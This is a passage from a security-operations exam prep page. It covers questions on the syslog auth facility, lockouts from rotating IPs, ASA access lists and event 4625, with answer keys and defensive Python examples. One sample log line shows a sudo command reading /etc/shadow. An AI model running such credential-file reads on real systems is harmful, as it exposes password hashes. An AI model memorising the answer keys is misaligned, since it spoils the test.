The syslog-ng configuration shown uses the `auth` facility, which corresponds to authentication-related messages (e.g., login attempts, sudo usage, user authentication). The `auth` facility is specifically designated for security and authorization events, making option A correct.

Exam trap

The trap here is that candidates may read `auth` as generic 'security event logs' (option D), but syslog-ng filters on the standard syslog facility names: the facility for authentication and authorization messages is `auth`, with `authpriv` for the sensitive subset, and 'security event logs' is Windows Event Log terminology rather than a syslog facility.

How to eliminate wrong answers

Option B is wrong because kernel logs use the `kern` facility, not `auth`. Option C is wrong because daemon process logs use the `daemon` facility, not `auth`. Option D is wrong because while `auth` logs are security-related, the term 'security event logs' is ambiguous and not a standard syslog facility; the correct facility for security events is `auth` or `authpriv`.
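The facility names above are numbers on the wire: every syslog line carries a PRI value equal to facility * 8 + severity, and a syslog-ng `facility(auth, authpriv)` filter simply keeps lines whose facility decodes to 4 or 10. The following is an added example (not code from the page or from the syslog-ng project) that decodes PRI values and applies the same selection to a few constructed log lines; the hostname and central-server name in the comments are assumptions.

```python
"""Decode syslog PRI values and mirror a syslog-ng facility() filter.

Added example; not from the page or from the syslog-ng project. The sample
lines are constructed. Per RFC 3164/5424, PRI = facility * 8 + severity,
and syslog-ng's facility(auth, authpriv) selects facilities 4 and 10.

Equivalent syslog-ng fragment (assumed, matching the question's description):
  filter f_auth { facility(auth, authpriv); };
  destination d_central { network("logserver.example.net" port(514) transport("tcp")); };
  log { source(s_local); filter(f_auth); destination(d_central); };
"""
import re
from typing import List, Tuple

FACILITIES = {
    0: "kern", 1: "user", 2: "mail", 3: "daemon", 4: "auth", 5: "syslog",
    6: "lpr", 7: "news", 8: "uucp", 9: "cron", 10: "authpriv", 11: "ftp",
    16: "local0", 17: "local1", 18: "local2", 19: "local3",
    20: "local4", 21: "local5", 22: "local6", 23: "local7",
}
SEVERITIES = ["emerg", "alert", "crit", "err", "warning", "notice", "info", "debug"]
PRI_RE = re.compile(r"^<(\d{1,3})>")


def decode_pri(line: str) -> Tuple[str, str]:
    """Return (facility, severity) for a line that starts with an RFC 3164 <PRI>."""
    m = PRI_RE.match(line)
    if not m:
        raise ValueError("no <PRI> prefix: %r" % line[:24])
    pri = int(m.group(1))
    if pri > 191:          # 23 * 8 + 7 is the largest legal value
        raise ValueError("PRI out of range: %d" % pri)
    facility, severity = divmod(pri, 8)
    return FACILITIES.get(facility, "facility%d" % facility), SEVERITIES[severity]


def select_facilities(lines: List[str], wanted=("auth", "authpriv")) -> List[str]:
    """Lines a log path with filter f_auth { facility(auth, authpriv); } would forward."""
    return [ln for ln in lines if decode_pri(ln)[0] in wanted]


# Constructed sample lines: auth.info, authpriv.notice, kern.emerg, daemon.info.
SAMPLE_LINES = [
    "<38>Mar  4 14:15:02 gw sshd[2211]: Failed password for invalid user admin from 198.51.100.7 port 51012 ssh2",
    "<85>Mar  4 14:15:09 gw sudo:   alice : TTY=pts/0 ; PWD=/home/alice ; USER=root ; COMMAND=/bin/cat /etc/shadow",
    "<0>Mar  4 14:15:10 gw kernel: Kernel panic - not syncing: Fatal exception",
    "<30>Mar  4 14:15:11 gw systemd[1]: Started Daily apt download activities.",
]

if __name__ == "__main__":
    for ln in SAMPLE_LINES:
        print(decode_pri(ln), ln[:40])
    print("forwarded:", len(select_facilities(SAMPLE_LINES)), "of", len(SAMPLE_LINES))
```

Only the sshd and sudo lines (facilities 4 and 10) survive the filter; the kernel and systemd lines stay local, which is exactly the distinction options B and C turn on.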

66
MCQmedium

A security analyst notices repeated failed login attempts from an internal IP address on the domain controller. After enabling account lockout, the lockouts continue but the source IP changes. What is the best next step?

A.Analyze the log events to identify the attack pattern and implement additional controls such as MFA
B.Increase the account lockout threshold
C.Ignore the event as it is likely a false positive
D.Disable the user account being targeted
AnswerA

Understanding the attack pattern allows for targeted controls like requiring MFA for the targeted account or blocking the attack vector.

Why this answer

Option A is correct because the changing source IP indicates a distributed attack, likely a password spraying or brute-force attempt relayed through multiple compromised internal hosts. Analyzing the log events helps identify the attack pattern (timing, targeted accounts, source IP ranges) so you can implement additional controls such as MFA, which mitigates credential-based attacks regardless of where the attempts come from. Account lockout alone is insufficient here: the lockout counter is kept per account, not per source, so it neither identifies nor blocks the rotating hosts, and an attacker who can trigger lockouts at will can turn the policy into a denial of service against the targeted user.

Exam trap

The trap here is that candidates assume account lockout is sufficient and focus on tweaking lockout thresholds (Option B), but the changing source IP reveals a distributed attack that requires a different control like MFA, not just adjusting lockout parameters.

How to eliminate wrong answers

Option B is wrong because increasing the lockout threshold would allow more failed attempts before lockout, making the attack more successful and increasing the risk of account compromise; it does not address the root cause of distributed IPs. Option C is wrong because repeated failed login attempts from changing IPs are a clear indicator of an active brute-force or password spraying attack, not a false positive; ignoring it could lead to unauthorized access. Option D is wrong because disabling the targeted user account is a reactive, temporary measure that does not stop the attacker from targeting other accounts or using different credentials; it also disrupts legitimate user access without addressing the underlying attack vector.

67
MCQhard

Examine the Cisco ASA access-list named 'outside_in'. A penetration tester reports that they were able to establish an RDP session from an external IP address 203.0.113.55 to the internal host 10.10.10.10 on port 3389. Which configuration change would BEST prevent this while still allowing legitimate remote administration from the authorized management station?

A.Change the RDP rule to deny any source and add an explicit deny before the permit rules
B.Add an explicit deny rule for RDP from any source before the existing RDP rule, with logging enabled
C.Delete the second line (the HTTPS rule) and add a rule to deny RDP from all external sources
D.Modify the RDP rule to permit only from source host 192.168.1.100
AnswerD

Restricting the source to the authorized host prevents unauthorized external RDP connections.

Why this answer

Option D is correct because the current RDP entry permits TCP/3389 to 10.10.10.10 from any source, which is exactly what let 203.0.113.55 connect. Narrowing the source to `host 192.168.1.100` keeps the rule for the authorized management station, and because the ASA evaluates an access list top-down with first match winning and an implicit deny at the end, every other source falls through to the implicit deny.

Exam trap

The trap is ordering: options A and B both put a deny in front of (or in place of) the permit, so the management station is cut off together with the attacker. The question asks to stop the unauthorized access while still allowing legitimate administration, so the fix is to restrict the permit's source, not to add a broader deny.

How to eliminate wrong answers

Option A is wrong because changing the rule to deny any source blocks RDP for the management station as well as the attacker. Option B is wrong because an explicit deny for RDP from any source placed before the permit matches first for every RDP packet, so the later permit never takes effect; logging makes the blocked attempts visible but does not restore legitimate access. Option C is wrong because deleting the HTTPS rule breaks unrelated legitimate web traffic, and a blanket deny of RDP from all external sources still does not carve out the management station.
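The first-match behaviour is what decides between the options, so it is worth walking the packet through each version of the access list. The following is an added example (not code from the page or from Cisco): a small parser and evaluator for ASA-style extended ACEs applied to the pentester's packet and the management station's packet. The exhibit is not reproduced on the page, so the `outside_in` entries below, including the HTTPS rule's host 10.10.10.20, are an assumed reconstruction.

```python
"""First-match evaluation of a Cisco ASA style extended ACL.

Added example, not from the page or from Cisco. The 'outside_in' entries
below are an assumed reconstruction of the exhibit (which is not reproduced
here). The ASA walks an ACL top-down, the first matching ACE decides, and an
implicit deny sits at the end.
"""
import ipaddress
from typing import List, Optional, Tuple

ACE = Tuple[str, str, str, str, Optional[int]]   # action, proto, src, dst, dport


def _take_addr(tokens: List[str]) -> Tuple[str, List[str]]:
    """Consume one ASA address spec: 'any', 'host A.B.C.D', or 'A.B.C.D NETMASK'."""
    if tokens[0] == "any":
        return "any", tokens[1:]
    if tokens[0] == "host":
        return "host " + tokens[1], tokens[2:]
    return "%s/%s" % (tokens[0], tokens[1]), tokens[2:]


def parse_ace(line: str) -> ACE:
    """Parse 'access-list NAME extended permit|deny PROTO SRC DST [eq PORT] [log]'."""
    t = line.split()
    if t[0] != "access-list" or t[2] != "extended":
        raise ValueError("not an extended ACE: %r" % line)
    action, proto = t[3], t[4]
    src, rest = _take_addr(t[5:])
    dst, rest = _take_addr(rest)
    dport = int(rest[1]) if rest[:1] == ["eq"] else None
    return action, proto, src, dst, dport


def _matches(spec: str, addr: str) -> bool:
    if spec == "any":
        return True
    if spec.startswith("host "):
        return ipaddress.ip_address(addr) == ipaddress.ip_address(spec[5:])
    return ipaddress.ip_address(addr) in ipaddress.ip_network(spec, strict=False)


def evaluate(acl: List[ACE], proto: str, src: str, dst: str, dport: int) -> str:
    """Return the action of the first matching ACE, or 'deny' (implicit deny)."""
    for action, p, s, d, port in acl:
        if (p in (proto, "ip") and _matches(s, src) and _matches(d, dst)
                and (port is None or port == dport)):
            return action
    return "deny"


# Assumed original exhibit: RDP open to the world, plus an unrelated HTTPS rule.
ORIGINAL = [
    "access-list outside_in extended permit tcp any host 10.10.10.10 eq 3389",
    "access-list outside_in extended permit tcp any host 10.10.10.20 eq 443",
]
# Option B: explicit deny inserted ahead of the permit, with logging.
OPTION_B = ["access-list outside_in extended deny tcp any host 10.10.10.10 eq 3389 log"] + ORIGINAL
# Option D: the permit's source narrowed to the management station.
OPTION_D = [
    "access-list outside_in extended permit tcp host 192.168.1.100 host 10.10.10.10 eq 3389",
    ORIGINAL[1],
]

PENTESTER, MGMT = "203.0.113.55", "192.168.1.100"


def outcome(lines: List[str]) -> dict:
    """Who gets RDP to 10.10.10.10 (and HTTPS to 10.10.10.20) under one version of the ACL."""
    acl = [parse_ace(l) for l in lines]
    return {
        "pentester_rdp": evaluate(acl, "tcp", PENTESTER, "10.10.10.10", 3389),
        "mgmt_rdp": evaluate(acl, "tcp", MGMT, "10.10.10.10", 3389),
        "public_https": evaluate(acl, "tcp", PENTESTER, "10.10.10.20", 443),
    }


if __name__ == "__main__":
    for name, lines in (("original", ORIGINAL), ("option B", OPTION_B), ("option D", OPTION_D)):
        print(name, outcome(lines))
```

Under the original list both sources get RDP; under option B the deny is hit first and both lose it; under option D the pentester falls through to the implicit deny while the management station and the HTTPS rule keep working, which is the combination the question asks for.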

68
MCQhard

Refer to the exhibit. A security analyst reviews this event log entry. What does this event indicate?

A.A successful logon by the SYSTEM account
B.A successful logon by a user account
C.An attempted exploit of a privilege escalation vulnerability
D.A failed logon attempt due to account lockout
AnswerD

Event 4625 indicates a failed logon; status 0xC0000234 shows the account is locked out.

Why this answer

The event log entry shows a 'Logon Type 3' (network logon) with a 'Failure Reason' of 'Account locked out' and a 'Status' of 0xC0000234, which specifically means the account is currently locked out after too many failed attempts. This is a failed logon attempt, not a successful one, and a lockout is distinct from a disabled account (that would be status 0xC0000072): the lock clears after the lockout duration or when an administrator unlocks it.

Exam trap

The trap here is that candidates see 'Logon Type 3' and assume it is a successful network logon, ignoring the failure status and lockout reason, or they misinterpret the lockout as a privilege escalation attempt.

How to eliminate wrong answers

Option A is wrong because the event shows a failure status (0xC0000234) and a failure reason of 'Account locked out', not a successful logon by any account including SYSTEM. Option B is wrong because the event explicitly indicates failure, not success, and the user account referenced is locked. Option C is wrong because this event does not show any privilege escalation exploit; it is a standard authentication failure due to account lockout, not an attack pattern like token manipulation or SeDebugPrivilege abuse.
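Questions 66 and 68 are two sides of the same log source: reading a single 4625 record correctly (event ID, logon type, status and sub-status), and then aggregating many of them to see the pattern the lockouts hide. The following is an added example (not code from the page or from Microsoft) that does both over constructed 4625/4624 records; the field names follow the event XML, the NTSTATUS meanings are the documented ones, and the account and host addresses are invented.

```python
"""Decode Windows Security event 4625 fields and spot a lockout pattern.

Added example; not from the page or from Microsoft. The event records below
are constructed (field names follow the 4625 XML schema); the status and
sub-status meanings are the documented NTSTATUS values.
"""
from collections import defaultdict
from typing import Dict, List, Tuple

LOGON_TYPE = {2: "interactive", 3: "network", 4: "batch", 5: "service",
              7: "unlock", 8: "network cleartext", 9: "new credentials",
              10: "remote interactive (RDP)", 11: "cached interactive"}

STATUS = {
    0xC000006D: "bad user name or password",
    0xC0000234: "account locked out",
    0xC0000072: "account disabled",
    0xC0000193: "account expired",
    0xC0000071: "password expired",
    0xC000006F: "logon outside authorized hours",
    0xC0000070: "workstation restriction",
    0xC000015B: "logon type not granted",
}
SUB_STATUS = {
    0x0: "",
    0xC0000064: "user name does not exist",
    0xC000006A: "wrong password",
}


def describe(ev: Dict) -> str:
    """One-line reading of a 4624/4625 record, as an analyst would state it."""
    user = ev["TargetUserName"]
    ltype = LOGON_TYPE.get(ev["LogonType"], "type %d" % ev["LogonType"])
    if ev["EventID"] == 4624:
        return "successful %s logon for %s" % (ltype, user)
    if ev["EventID"] != 4625:
        return "event %d (not a logon audit)" % ev["EventID"]
    reason = STATUS.get(ev["Status"], "status 0x%08X" % ev["Status"])
    detail = SUB_STATUS.get(ev["SubStatus"], "sub-status 0x%08X" % ev["SubStatus"])
    return "FAILED %s logon for %s from %s: %s%s" % (
        ltype, user, ev["IpAddress"], reason, " (%s)" % detail if detail else "")


def rotating_sources(events: List[Dict], min_ips: int = 3) -> List[Tuple[str, List[str]]]:
    """Accounts whose 4625 failures arrive from at least min_ips distinct IPs.

    One account, many sources is the pattern in question 66: a brute force
    that keeps going after lockout because the attacker changes hosts.
    One source, many accounts would instead suggest a password spray.
    """
    by_account = defaultdict(set)
    for ev in events:
        if ev["EventID"] == 4625:
            by_account[ev["TargetUserName"]].add(ev["IpAddress"])
    return sorted((acct, sorted(ips)) for acct, ips in by_account.items() if len(ips) >= min_ips)


def lockouts(events: List[Dict]) -> List[Dict]:
    """4625 records whose status is the lockout code from question 68."""
    return [ev for ev in events if ev["EventID"] == 4625 and ev["Status"] == 0xC0000234]


def _ev(eid, user, ip, status=0x0, sub=0x0, ltype=3):
    return {"EventID": eid, "TargetUserName": user, "IpAddress": ip,
            "LogonType": ltype, "Status": status, "SubStatus": sub}


# Constructed sample: five failures against svc_backup from four internal hosts
# (the last two already hitting the lockout), one good logon, one stray failure.
SAMPLE_EVENTS = [
    _ev(4625, "svc_backup", "10.20.0.11", 0xC000006D, 0xC000006A),
    _ev(4625, "svc_backup", "10.20.0.12", 0xC000006D, 0xC000006A),
    _ev(4625, "svc_backup", "10.20.0.13", 0xC000006D, 0xC000006A),
    _ev(4625, "svc_backup", "10.20.0.13", 0xC0000234),
    _ev(4625, "svc_backup", "10.20.0.14", 0xC0000234),
    _ev(4624, "alice", "10.20.0.50"),
    _ev(4625, "bob", "10.20.0.60", 0xC000006D, 0xC000006A),
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(describe(ev))
    print("rotating sources:", rotating_sources(SAMPLE_EVENTS))
```

Note that once the account is locked, every further attempt reports 0xC0000234 regardless of whether the password guessed was right, so the lockout records tell you the attacker is still active but no longer tell you anything about the credentials; the per-account, per-source aggregation is what exposes the rotating hosts that a lockout policy cannot see.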

Ready to test yourself?

Try a timed practice session using only Security Operations questions.